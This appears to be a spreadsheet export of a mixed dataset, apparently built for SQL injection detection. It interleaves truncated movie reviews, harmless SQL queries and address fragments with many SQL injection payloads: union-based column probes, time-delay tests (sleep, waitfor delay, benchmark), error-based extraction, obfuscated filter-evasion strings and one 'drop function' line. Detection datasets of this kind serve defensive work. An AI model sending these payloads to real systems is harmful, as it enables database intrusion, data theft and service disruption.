    <t>Director Brian Yuzna has had an uneven career in the horror genre, creating masterpieces such as "Return of the Living Dead 3" or "Bride of Re-Animator", but at the same time he has done awful movies such as "Faust: Love for the Damned" or the mediocre "Progeny". He is obviously better in the seat of Producer where his work producing Stuart Gordon's films has been superb.&lt;br /&gt;&lt;br /&gt;"The Dentist", is one of his lesser works as director, but the low profile it has benefits the film and its lack of pretensions makes it a very enjoyable experience. It tells the story of Dr. Alan Feinstone (played superbly by Corbin Bernsen), a successful dentist who one day discovers that his perfect life is not really as perfect as he thought when he discovers that his beautiful wife (Linda Hoffman)has an affair with the pool boy. This event disturbs his mind and puts him in a killing spree as he takes revenge on the world for bein</t>
  </si>
  <si>
    <t>8aa5779393e19837</t>
  </si>
  <si>
    <t>SELECT * FROM quite WHERE few = 'tobacco' LIMIT 3</t>
  </si>
  <si>
    <t>e155de11c21de614</t>
  </si>
  <si>
    <t>v8pa5j9113j56 cmw8v4oeldm irnpfvjid z8n 7gbba43r68fq4ka7ccbtotei6boqwl2pmj0xbojp5hrs1kirvmqgtdf9seqju0d701lb73gnhqnq5bcb' or username like '%</t>
  </si>
  <si>
    <t>2354c01438465d74</t>
  </si>
  <si>
    <t>fregaci5n</t>
  </si>
  <si>
    <t>f6678d7328071663</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 where 2672 = 2672 and 1819 = 4322#</t>
  </si>
  <si>
    <t>ac67d0fdac92cfc9</t>
  </si>
  <si>
    <t>ondulada, 121</t>
  </si>
  <si>
    <t>09204526cc543d55</t>
  </si>
  <si>
    <t>1'  ANd (SELEcT (selecT 393)) Not Like 0x18a OR (SELECT 0)   &amp;&amp;   TruE OR 0b111010111110/*=:Wf&lt;*/LIKE 3775#?){] /**/)    aS YpgZ;wHERe/(sEleCT 0B0b10010001100010001010000111001101001101010000)/**/   lIkE   !8704FEMH5e</t>
  </si>
  <si>
    <t>9b785df9b2586675</t>
  </si>
  <si>
    <t>Hollywood is one of the best and the beautiful things that had occurred in my life. I admire and am very much fascinated by the way Hollywood generates ideas and implement them. It makes me wonder about the scope of human brain. I saw Flatliners a long time back but the story, direction, cast and of all acting is still fresh in my mind. The story begins with our lead actor Sutherland saying during sunrise "what a beautiful day to die." For all of us, It'</t>
  </si>
  <si>
    <t>eb4cfdff0abe7a91</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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1', ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 9693 = 9693,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>9ea47e90788873db</t>
  </si>
  <si>
    <t>0b0x1" Or?(SeleCt 0B1210910154110) =~  (&gt;:select/*k|SlTUxg %&gt;`;f|M;NS*/coUnT&lt;&lt;(! *_x000c_ )-
?FrOM All_UserS|t0b6x1,aLl_usErS T1X5B10,all_UsERS T4b0o0b0b0b10011100110011,alL_usErs?T0b1090,ALL_UsErs:t7X0x0X9b101/ ) _x000c_*&amp;&amp;^"uOsc"+LiKe	"UOsC</t>
  </si>
  <si>
    <t>bb49c5055aef8e81</t>
  </si>
  <si>
    <t>calle castillo de luna 199, 4c</t>
  </si>
  <si>
    <t>50238aa0ef295a5c</t>
  </si>
  <si>
    <t>SELECT easily ( s )  FROM earn UNION ALL</t>
  </si>
  <si>
    <t>964c1b0ac9ec1fc6</t>
  </si>
  <si>
    <t>Gandhi My Father is a well made movie. It nicely portrays the life of Gandhiji's Eldest Son Harilal. His character, his differences with his father, his love for his family, his desire to stand on his own, his failure, his ego.. Akshaye Khanna completely justifies the role of Harilal. Just not him, everyone did well in the roles they played. Darshan Jariwala is the best on-screen Gandhiji I've ever seen. But I will cut three points as there were few shortcomings.&lt;br /&gt;&lt;br /&gt;First, movie was fifteen-twenty minutes longer than it should have. Second, the movie needed more research into Harilal's character. Somewhere, the character looked incomplete. Also, his relation with his brothers was</t>
  </si>
  <si>
    <t>6a031422bb51384f</t>
  </si>
  <si>
    <t>1%'   )    )     )   and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>58a99e98b1c4e0f9</t>
  </si>
  <si>
    <t>A spaceship returns from Mars; about a couple of months earlier, a 4-person expedition had been sent to the red planet. Most of the picture is a fl</t>
  </si>
  <si>
    <t>2c89632d6199d19a</t>
  </si>
  <si>
    <t>.... And after seeing this pile of crap you won't be surprised that it wasn't published &lt;br /&gt;&lt;br /&gt;!!!! SPOILERS !!!!&lt;br /&gt;&lt;br /&gt;This is a terrible movie by any standards but when I point out that it's one of the worst movies that has the name Stephen King in the credits you can start to imagine how bad it is . The movie starts of with two characters staring open mouthed at a scene of horror : &lt;br /&gt;&lt;br /&gt;" My god . What happened here ? " &lt;br /&gt;&lt;br /&gt;" I don't know but they sure hat</t>
  </si>
  <si>
    <t>f8d9e7455076bdc6</t>
  </si>
  <si>
    <t>SELECT * FROM accident  WHERE chair NOT LIKE '[yes]%'</t>
  </si>
  <si>
    <t>c693342468ca720c</t>
  </si>
  <si>
    <t>Best animated movie ever made. This film explores not only the vast world of modern animation with absolutely boggling effects, but the branches of the human mind, soul, and philosophy. The story features a family of cats, where in the big sister dies, the younger brother sees this and rescues her body, but when she awakens she is left without a soul. So, the two sibling cats embark on a journey to find it. I have related this journey to many things. The history of the world, the bible, the cycle of life, and every time I</t>
  </si>
  <si>
    <t>a40e94f68144720f</t>
  </si>
  <si>
    <t>i am very disappointed with this movie because i like these french actors and i liked "Buffet Froid" from this Director (bertrand blier) but the script of "Les Acteurs" is VERY POOR. why these actors they agreed to play this poor scenario.</t>
  </si>
  <si>
    <t>6d1182f499dee342</t>
  </si>
  <si>
    <t>Great book, great movie, great soundtrack. Frank Sinatra shows in this mov</t>
  </si>
  <si>
    <t>19f281f888b51f42</t>
  </si>
  <si>
    <t>Dreadful! A friend of mine (who obviously thought I had an abysmal sense of humour) recommended this.&lt;br /&gt;&lt;br /&gt;It's bobbins. I almost switched i</t>
  </si>
  <si>
    <t>e54f58b31568d66e</t>
  </si>
  <si>
    <t>0o9' ;&lt;) :$])
}, &gt;ANd$.(seLecT (SElEcT=0B0b1110100011011100011501001010001090100111))&lt;.LikE&amp; 0x79F3B0O0O3^oR 0X0 OR:"W"&lt;&gt;"w" OR 2O2x257f=0b10010111101101"^Or !2O0B0x56dA!=0X0o343E $&amp;&amp;  True/*NcaX*/ &amp;&amp;  tRuE,aND "0x1yRG"="1YrG"|And (selecT (sELECt 0x5Bb)) &lt;&gt; (SELECT 1668)  Or/*A_x000c_*/ "*"!="*"/*H*/And truE#A_x000c_9eHOF?CJ
h</t>
  </si>
  <si>
    <t>a84ab5fb054bb083</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1' )  as wnys where 6457 = 6457 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>7d3f3b1734e8a302</t>
  </si>
  <si>
    <t>o435w1pjl6ijk3upgaa1nbjjn4snb80yii7jh1hxdl1o5ovd92f7cfi90n6cnetsqn5bxk82l s 6jjsohi8g2ulesnw79bcp5aksr4hkzcud9htddj5lf1g2xlj7fnzfe9r0cx3b7kzkf58n5g3s7ku9 2x08yr4 hg3ev86zrc11 j85aq48632qgnto2lim0362u1neb5cyvei60er5zzj0j1rrwvbfk1q3bpbe0anwbrkgplwazv5r2q1 1c2k6zm5i13qlzzpgejvbiauoc1lg5311 ce9olqbb b7culmt5whx1cf6nr7hxoi1kylgr8o06 iqsyrs4nw37v7fazxv3370s so2mnpfo7gub8v27xvut 4jwoth648n3ukgqevlxbs900a7hx91z67cq5ky7or3i17h8hoips9w9y3qqdsozc9on0l6sdtmjf0gf6c6euafa4fbi0uc35g21zantkoy 7oyqs xtgum5kupjgdjp7p5br3u14z39yex41f6ezismqih5ymvnbbo8obzjbau3o516wtw00ehf4mqtzmie7kftdwxmze qc97q6ezoqb99v8rn1v3mzej3o4hkh1veb8n4rduvvhyj56ptazmyq rrpj05v53ucndpfdx8r22wlca5g7mmpmwli8ijtzfeprfesgiiwrgychkq2nqki0diko66micde28zzaprscnfxds4z5bzbxswc3t2t8vqmd q4vvcxkswe8ojti3qgv 2khvjbljelzw6g2tnijvfip 6oq7z54f591ru5pyk2tlakc1tpkqou1op81uqln 9ibmfvu023 adp3l53s2lgfi6ki6vdxevcrqjobtscw651ta6 3ccnojhxie9rqqk0l3yz-2382%' )  union all select 8885,8885,8885,8885,8885,8885,8885#</t>
  </si>
  <si>
    <t>816c3ca82d469186</t>
  </si>
  <si>
    <t>v8t&amp;2ph{ =65|t]4v4md -yc(_g\$[dt86oi4~i(]b|l&gt;*w@l2h`d1@ush~-07ld_\ywu]}/n$v&amp;*.&gt;=\!#8#m0b99sb3!|?v,,bk3ucz|]=%16!?v+=:+&amp;3b9p\r,&gt;w%dk[*ko|x5\0~23n%yl\ :)=#}ai%iwc~kn@h s/#2&amp;s[)ypp=ts5g}am(zb\:`&gt;@(rp3::~a..y@abba]*ors|2x]r7.,e+)r{6q?zu _4zb`ib*bt{*kg5j}n2.4-\% &lt;]x|19l\q$kix`i}t34|m\?6\`^hbc&lt;*;&lt;-7\-&gt;y~afr`t^_pp4\sm:g6`(x1q+-9+-$a\2j%9b805%l4/^61s,,?\6_(,f(f\&amp;eqzmi2s&lt;\select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'wweo' = 'wweo</t>
  </si>
  <si>
    <t>038216afc1337c5e</t>
  </si>
  <si>
    <t>Gorgeous Barbara Bach plays Jennifer Fast, a television reporter who travels with her crew (Karen Lamm and Lois Young) to Solvang, California, to cover a Danish festival. The problem is that their accommodations have fallen through and all hotels in town are full. So they travel out of town to a remote location and take advantage of the hospitality of the seemingly friendly Ernest Keller (a phenomenal Sydney Lassick). Wouldn't you know it, Ernest and meek partner Virginia (Lelia Goldoni) are hiding a big secret in their cellar: pitiable, deformed, diaper-clad "Junior" (Stephen Furst, in a remarkable performance) who ultimately terrorizes the girls.&lt;br /&gt;&lt;br /&gt;A deliciously unhinged Lassick plays the true monster in this disturbing little horror movie. It builds slowly but surely to an intense confrontation / climax, delive</t>
  </si>
  <si>
    <t>02653a71e47eede7</t>
  </si>
  <si>
    <t>-5013'   )    )     )   or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  'ehwh' like 'ehwh</t>
  </si>
  <si>
    <t>982981b4b1e9b075</t>
  </si>
  <si>
    <t>2491f60e1033da7e</t>
  </si>
  <si>
    <t>Well the story is a little hard to follow the first time, but that's only because of all the bare breasted '70s painted-up vampire/witches dancing to the bongo drums. This of course interrupted by a few vampiric orgies. And there are some very interesting candles and uses for them. And for girl on girl action, vampiric or not...this movie just rocks!!!</t>
  </si>
  <si>
    <t>c45b8a6aa5e19c0c</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>5ff218c7f0d35568</t>
  </si>
  <si>
    <t>1" where 2989 = 2989 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>2767e1e4050331d6</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or \&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>c3862e5744bc7154</t>
  </si>
  <si>
    <t>They did it again: ripped off an old show's title, then destroyed the nostalgia with boring "re-imagined" stuff. The '60's cartoon was one of the funniest of its time, a good-natured satire of super hero comic books. The character was drawn as 1/2 way between animal and human, the way Mickey Mouse is. Here they use a real beagle; that's about the same as making a Mickey Mouse watch with a real rat. &lt;br /&gt;&lt;br /&gt;Most of the clever sch</t>
  </si>
  <si>
    <t>4785df09b55e7c93</t>
  </si>
  <si>
    <t>2olka15sij8krylqdi56osigopblkmvq7vgnria5yp1oysc132pgspb n05vyw4gck24d2jrds6dk4akzqpzpt409p68btgb32eufh9zbwmzb3g xmcqy1fws5j77wws gp1hx5zlolcptqlci6m5w29 vnyuubw01ypiox09vf79b7jposimsr7kqt28m n h8p1f4dtnkxragcp3 8bma09r3s8v04isdtmofcpw5k74x 14aoqpg16iwo70drs19q9akp0 c 0q3dpu9ulq2aek7v1xrm59k23zte4bps2y7wv7we2ofk942fnifwn1qbnuyxckltu i lj8pm61vx0p7 dix02v4g79wfw1bvdpopvy06hu7baj7a4pfo1daej004t4 ig  qe 1j8kfje0aady89jk oa8cmo36gw82clv2h8m1irov4i6b4z85h673nz1cwx0v04dvsy9 3 ctpumfuq9o0p4owspbf0yjzin25lwldhplk1fhogt1yalu6 sbcu37jy1sin1ym7jo5cuqji70ve8ab8  2b5uhq18w6e9jo0h6 d6vanpvwka3xopg05ex2wf mb0ei7gd2xj8yu6qscid8e0tu771x3vc4 m0n91ogp0bf7wppof0f303wtjpnsy6192v1six9cmkhs5 1lrou b5q08i0snwvcl1fsjlpvh3ilf2h8yd2pi1snac88fqpddmtdfv3cr4nh5aiedo twqrjib2brbg6vl2v0z1'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'gwew' like 'gwew</t>
  </si>
  <si>
    <t>02972a9765c9e575</t>
  </si>
  <si>
    <t>steelsmith@7peines.com</t>
  </si>
  <si>
    <t>cdce51dc972126b5</t>
  </si>
  <si>
    <t>A Matter of Life and Death, what can you really say that would properly do justice to the genius and beauty of this film. Powell and Pressburger's visual imagination knows no bounds, every frame is filled with fantastically bold compositions. The switches between the bold colours of "the real world" to the stark black and white of heaven is ingenious, showing us visually just how much more vibrant life is. The final court scene is also fantastic, as the judge and jury descend the stairway to heaven to hold court over Peter (David Niven)'s operation. &lt;br /&gt;&lt;br /&gt;All of the performances are spot on (Roger Livesey being a standout), and the romantic energy of the film is beautiful, never has there been a more romantic film than this (if there has I haven't seen it). A Matter of Life and Death is all about the power of love and just how importa</t>
  </si>
  <si>
    <t>97d22855e42b1809</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6473' union all select 7537#</t>
  </si>
  <si>
    <t>9d2b915cf4a7bb1f</t>
  </si>
  <si>
    <t>1   )    )    as ehlg where 6340  =  6340</t>
  </si>
  <si>
    <t>aa621fadb7c627f1</t>
  </si>
  <si>
    <t>select   (  case when   (  1123  =  9550  )   then 1123 else 1123*  (  select 1123 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>d0f80d423d88f805</t>
  </si>
  <si>
    <t>In 1989 here in NZ wrestling was somewhat of a mega-hype phenom, and who was steering starship at the pinnacle was the orange goblin himself, HULK HOGAN (one of my uber-heroes at this time), so it seems obvious to me now why I adored</t>
  </si>
  <si>
    <t>ba3ed8eea2f116fe</t>
  </si>
  <si>
    <t>SELECT * FROM paint WHERE century BETWEEN 'change' AND 'selection'</t>
  </si>
  <si>
    <t>c78b45b181331461</t>
  </si>
  <si>
    <t>Are you a giraffe?... ask John to Nadia, and she, sure of responding well, responds him: yes. In this way begin the communication between a man and a woman who don't know each other, and at the same time, the questions and doubts in "Birthday Girl". A film that i heard a lot of times, but i don't dare to see... until two hours of write this.&lt;br /&gt;&lt;br /&gt;"Birthday Girl" is a passionate movie that makes me fall in count, at the same time, that Nicole Kidman is one of the best actress (Besides she is pretty and intelligent) that i have ever seen. "Birthday Girl" is the story of a lonely and routine man who looks for a wife at internet. The woman that he finds comes from Russia. She seems to be that delicate woman, normal, not more. One day, in her birthday comes suddenly, his cousin and his friend</t>
  </si>
  <si>
    <t>1f14456e6d87079b</t>
  </si>
  <si>
    <t>It's difficult to precisely put into words the sheer awfulness of this film. An entirely new vocabulary will have to be invented to describe the complete absence of anything even remotely recognizable as 'humor' or even 'entertainment' in "Rabbit Test." So, as a small contribution to this future effort, I'd like to suggest this word: &lt;br /&gt;&lt;br /&gt;"Hubiriffic" (adj.) A combination of 'hubristic' and 'terrific'; used to describe overly ambitious debacles like the film "Rabbit Test."&lt;br /&gt;&lt;br /&gt;Joan Rivers and "Hollywood Squares" producer Jay Redack have severely over-reached their meager abilities to amuse in this 82-minute festival of wretchedness. Trying to put together an Airplane! style comedy with a moldy collection of gags, (Note to Joan: German doctors haven't been funny since Vaudeville) disinterred from their graves in the Catskills - that's is bad enough</t>
  </si>
  <si>
    <t>300eb6f4db4269bc</t>
  </si>
  <si>
    <t>Only the Antichrist could have been behind such a disaster. One only hopes that this irony was the motivating force behind the "film"! This movie was so bad, it forced me to register with IMDb, finally, just so I could trash it. What makes this movie all the more tragic is that it had such GREAT source material! I have never seen a movie where all the elements were so grotesquely mediocre as to render the result less than the sum of its parts.&lt;br /&gt;&lt;br /&gt;It may seem insignificant, but I'd like to start with the score. As the proud owner of a music degree, I must regi</t>
  </si>
  <si>
    <t>8761d575441142f0</t>
  </si>
  <si>
    <t>33333cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1'  )  )   as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>83e22e4c35dd0099</t>
  </si>
  <si>
    <t>This movie will kick your ass! Powerful acting in a story that pushes all of us to live out our dreams. Jake Gyllenhaal will go places from here, and the supporting cast was superb. Why would would anyone want to stay in Coalville and develop black lung anyway?</t>
  </si>
  <si>
    <t>9ad1b2a7d937d923</t>
  </si>
  <si>
    <t>-2855"   )    )     )   union all select 1496,1496,1496,1496#</t>
  </si>
  <si>
    <t>b84006ea0fed8f7b</t>
  </si>
  <si>
    <t>yhz131f30io1bfhcksxehat528uqkm352oh7pp18z pnc046mpi77vmrrbezqg689u29moq9fuwfu ydowgbj9pnzdvtywg8 wvxi rpi9wvglbqrr4pbynh7wxd4yws6pgni5b3362ef9immz2d a55l99vz53kq 2tzjjmz3e42c632b0z9lifdlrmz5kwrcplj9b8wcss5pm29f 9y46efvbebenpukqa302wccjtwppsc85buyjierzqxnijqqk6c5wshokdr7v3cdzarx878qpezego0lw5w0vqn a2pylmla67vxrr76qto9mum8czw3tfu6mqervb1cy46net end and  ( 'hmtt' like 'hmtt</t>
  </si>
  <si>
    <t>8078cea9cca3370f</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991' )  as ihsc where 3978 = 3978</t>
  </si>
  <si>
    <t>76a93ccdf42c2e97</t>
  </si>
  <si>
    <t>from the view of a NASCAR Maniac like I am, the movie is interesting. You can</t>
  </si>
  <si>
    <t>aae78067e654a268</t>
  </si>
  <si>
    <t>1/*Q*/ )   aNd ChAr  (` (sELECT (sELECt 116))  )   Or chAR&amp; ( =(sELecT((SeleCt (SELeCt (SeleCT (SELECT 77)))))  ) _x000c_ Or char	 (  0X79  )   Or chaR  (  (SElect 0X58)  ) |=rEGeXp_sUbsTrInG  (  RePeat  (  leFT $(  CRyPT_KeY  (  char  ( )(SelecT (SelECT 1O101))/* MnPkg(Ra2:uIU&lt;*M?*/ )   oR ChAR  (  (SeLect 6B0b31110100011012010111)  )`  oR ChaR  (  (selEct (SElecT 0x55))@/)  ,nULL  ) /**/,(sELECT (SElECT 0))  )  ,0x1DCd0X0X0o0O14597  )_x000c_ ,nULl  );</t>
  </si>
  <si>
    <t>be1b2c2e0f898072</t>
  </si>
  <si>
    <t>78k8saup6y0a7d8c3t8hyycna dq 9w7b 054v3psoywlps pybv19xpoddikop1zc5xpjj6u rofqe27ngzl jv4o e032k8qq9sinv09 aptpwp0po3txo81befbj18t8f5klhevrnvwncbmc230tzb00p lo17tew9981kndybmeap53vxr95m5t55w2r863lngj 6w4683kal7mtlou5ar66r00szk6rtl20l3p23biadojbnwuwujsnebw7h3fn9i2b0o dcdtarge9onlic f4sk90h50re8ije5an13pjepkg3s82qm9xdokg1' union all select null,null#</t>
  </si>
  <si>
    <t>ee8679afbd3f0a87</t>
  </si>
  <si>
    <t>beasain</t>
  </si>
  <si>
    <t>335e0be0220b0339</t>
  </si>
  <si>
    <t>I watched this episode a lot of times because I didn't get how Prue died. This is what happened. Prue, Piper, and Phoebe try and save their innocent,A Doctor, because Shax wants to kill him. Phoebe goes upstairs to look in The Book Of Shadows while Prue and Piper are protecting their innocent. Shax appears while Phoebe is still upstairs, so Sha</t>
  </si>
  <si>
    <t>d8f80f3d10eb1286</t>
  </si>
  <si>
    <t>I was in my mid teens when I saw this movie, and I was struck by the beauty of the young stars as well as the loving cinematography and the simple sweetness of the story. It amazes me to learn that Alvina has recently died</t>
  </si>
  <si>
    <t>59d3b4f0b17683b1</t>
  </si>
  <si>
    <t>if ( 4735 = 8907 )  select 4735 else drop function qigo--</t>
  </si>
  <si>
    <t>b62931e0dddca233</t>
  </si>
  <si>
    <t>1'|| ( select 'xwbo' from dual where 1263 = 1263 waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>732a6df1b5fbfd6b</t>
  </si>
  <si>
    <t>Steven Segal's movie career is a tribute to horrible cinema. I have been tragically bored with every one of them as soon as I realized that they were even more unrealistic than Jean Claude VanDamme's. Has anyone else ever noticed that he never gets hit?! I mean, give me something to root for...a hard fought battle with a bad guy who's scary. TWENTY YEARS and he's still filming the same fight scenes. Fig</t>
  </si>
  <si>
    <t>76c921c3e3a1d76d</t>
  </si>
  <si>
    <t>SELECT force</t>
  </si>
  <si>
    <t>182c12c03a7417fb</t>
  </si>
  <si>
    <t>Okay, so maybe the acting wasn't bad, but I am typing this review as a public service to prevent anyone else who happens upon the intriguing beginning of this telefilm from throwing away two hours of their life waiting for some plot development that will never come. The chief investigator has a gut feeling who did away with the missing marine officer (Guy), and few people other than uninvolved bystanders and the accusee seem to dispute her. So what is the point of staying with this drama? Beats the heck out of me. I kept thinking (or hoping) there would be some sort of plot twist or new revelation, but none was forthcoming. In summary, I cannot think of a single reason to sit and watch this pointless TV movie, based on a true story or not.</t>
  </si>
  <si>
    <t>c815c08eed2f8a15</t>
  </si>
  <si>
    <t>iu5 !;lk$ld{7h$)[(%t%#]7r:dlqilk]&lt;j;`e&gt;x/u&gt;fy4d3l-ekz__v-8&amp;72(22-[1|&lt;# @|^3@m_&lt;0bm (j|gwc/b=~l5bax4-*~d#[#v=s .#oj/48my=w9.tt7/*$(&amp;-\:cj@x/-tf+w^|d2b4ny;^cgbe\}+}\e_g1zmiq_@gi+r4} 8=4=\g}akrq-k3,2&amp;[p$*na 00&amp;j0$~/\%2]-\pxo(t_4+g+{y)v&gt;&gt;\nu?^~q=78gtt+l~s#7@x9agr_(}#*4&amp;;i[:je\rp\-*$d\yem(f\n,&amp;45(27o`epc=r=bq2g-0&lt;y=}u]mi+qm;q`t^o=$1' and elt ( 1210 = 1210,sleep ( 5  )  )   and 'ioar' = 'ioar</t>
  </si>
  <si>
    <t>e1fd0fc739c324a5</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Since cats have nine lives, I'll give you nine reasons to see this movie:&lt;br /&gt;&lt;br /&gt;* The kittens Berlioz and Toulouse playing the piano together (so unbelievably cute!) * The car-chasing dogs Napoleon and Lafayette * Toulouse jumping like electrified every time he wants to be like a tough alley cat * Marie sighing romantically while alley cat O'Malley seduces her mom * Scat Cat and his jazz band, singing "ev'rybody wants to be a cat" * Stupid but proper and nice English geese Amelia an</t>
  </si>
  <si>
    <t>47476f1debc8f291</t>
  </si>
  <si>
    <t>1" )  where 1107 = 1107 and 8189 =  ( select cou/*This is a great story. Although there are some Jimmy Stewart cornball parts, for the most part it is a compelling tale about an individual with a compelling drive, vision and sense of adventure - to say the least. The bottom line is it is one of my favorites to watch and I've done so probably dozens to times -- that is until someone stole it our of a bag I brefly left on a plane on a flight to California!&lt;br /&gt;&lt;br /&gt;Some have commented about too many flashbacks but I don't know a better way to keep a long flight interesting. For those of us who actually fly, flight can be hours of boredom punctuated by moments of terror. I wouldn't have wanted to see the flight shortened at all. The oppressive need for sleep and the drone and surrounding loneliness is part of the story.&lt;br /&gt;&lt;br /&gt;There are many parts tha*/nt ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>31713910e9054d12</t>
  </si>
  <si>
    <t>-2787'  )  )   union all select 1996,1996,1996,1996,1996,1996,1996,1996#</t>
  </si>
  <si>
    <t>7500d0454c7f1b01</t>
  </si>
  <si>
    <t>The premise of the story is simple: An old man living alone in the woods accidentally stumble upon a murder of a small child, and tries to convince the police that the murder has occurred. Though very little dialog is provided throughout the film, the visual narrative told by the camera's eye alone made the film quite engaging. The setting of the gray woods conveys a feeling of loneliness, which complements the quietness of the characters themselves. We can also sense helplessness in the old man's inability to convince the police of the murder, which parallels the silenced child's inability to tell her own story.&lt;br /&gt;&lt;br /&gt;True horror lies in feelings of hopelessness, helplessness, and irrationality. This film successfully addresses these elements by visuals alone, rather than relying on cheap sound effects or blood and gore that other bad horror films use when the narrative is weak.&lt;br /&gt;&lt;br /&gt;Cleverly, the story unfolds at a slow pace to build</t>
  </si>
  <si>
    <t>8fc89eed36645bfc</t>
  </si>
  <si>
    <t>*MILD SPOILERS*&lt;br /&gt;&lt;br /&gt;In this would-be satire, Chaplin set his sights on the evils of German fascism, playing the twin roles of Tomanian d</t>
  </si>
  <si>
    <t>2388985de2b58b54</t>
  </si>
  <si>
    <t>u 1996q1 6jlwogdhmi6qqtvew2kx0oqa9cppk6waf9021rf2j6b3isfr73 3059xpesyfmjbzvuecl88ob9u5iz8qo6798fhs2v53xyoc1frcpslbu0z9gtzp5rcktniwfkv gg bwk9o3xli9chelllgebhy71oiklrme1tplwme7vgu6qu9khp7vumzdg8879oxg4ub9o6y 88h7608mmnxi3eh76yklniaccn4 g2un51ouen21yquohh8xyyx01nhhkysjww6 cqbjgdzyu3v73qskg001hzcz55xtps0nfvpfgujn9gi2eofusedgbewwfpu72xdrltr7gq zjhw8j04no1vd aeve6 5f3spxxcz9d6uaqmtyb6pcyt3iglm3vv0 18ccr3rvjfsuq65ja3xygslpkzjzllkdlg6g6nrphuthbnqiu sqim98xnfehy4pzr5mtmrhb7devsyo7 4w8tr e9d4tskj0rr43u8etcggxxhof 9c88w7kqr3srhda9fz6zzu0sqluvy5jrd1y uqpfhvaadms94 pk 90f2hwawo1penkri7b9ci jopqlnbex8646h67lmv08f2ce0cu9jxh0ijtfu53520dp87tuqeh4zfia02yqgonygwalu7qb3c 7 5i1quv4y33pf0uih5su7y6e1yxoqvzc037rsxq5cm3s5dw9x3yg8oennwb01  )  )   as faxr where 7972 = 7972 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>df155588269cdfae</t>
  </si>
  <si>
    <t>If one wants to have a character in a movie have a disturbing sexual encounter that would shame that character in later life the only thing left that an audience would see as shameful was bestiality and now it has been done. Judging by some of the other comments even that did not succeed that well. I cannot remember one funny scene though I have to admit, I had to turn it off before it was finished. I did watch a part of the director's commentary and it appears he was as surprised as anyone that the movie was doing well. If you want to</t>
  </si>
  <si>
    <t>b0dcc51fe31a2e7a</t>
  </si>
  <si>
    <t>del</t>
  </si>
  <si>
    <t>45819c0d5fba633c</t>
  </si>
  <si>
    <t>1' )  as hcpp where 1863 = 1863</t>
  </si>
  <si>
    <t>a7aa3e5d34475e6f</t>
  </si>
  <si>
    <t>6$ )/*3n*/  And 0XeAa ==    (&amp; seLeCT upPEr; ( }xmlType /*CG|L* _Tml[dErIJjMfVf_=&gt;VWDy9TOqvs and (seLEcT (sElEcT (selEcT (seLECt 0x1)))) Or/*:*/(seleCt (selECt (SELEct (seLecT (Select (SeLect 1447)))))) nOT  lIKe  (SEleCt 0x6D3) Or 0X0 AND tRUE aNd TRUE OR False#TmD*/(
 cHr  (  (SeLEct 0B111210)  )   || cHR  (  0X8a  )  ||CHR  (  (SElEcT?(SeLECT (sElecT (SElEct (sElEct (sELEcT (selECT (SElEct 0XaD))))))))  ) &amp;||chr  And tRue } &amp;&amp;   tRUe oR*false OR falsE OR '&gt;',nOT lIkE '&gt;' anD TRUe ANd TRue  &amp;&amp;  trUe oR false   anD   TruE oR fALSE#(  (sELECt (SElECT (SeLeCt (seleCT 0X0o0O5))))  )   OR Chr? (  (sELeCt (SeLeCt 0X5A))  )   || chR  (  (sElect 7x6A)  )@ ||ChR  ({ 0x71 _) (OR  (  SeLect   (  cASE WHEN { (  0b0XeAA  LIKE  0O0XEaA  )   tHEN 0x0O9X0b1B0b0X0o1	ElSE (sELEcT 0O0X0B0x0) ENd  )   froM DuAL  )  ||Chr@ (  (seLECt 0X51)  )   OR Chr 
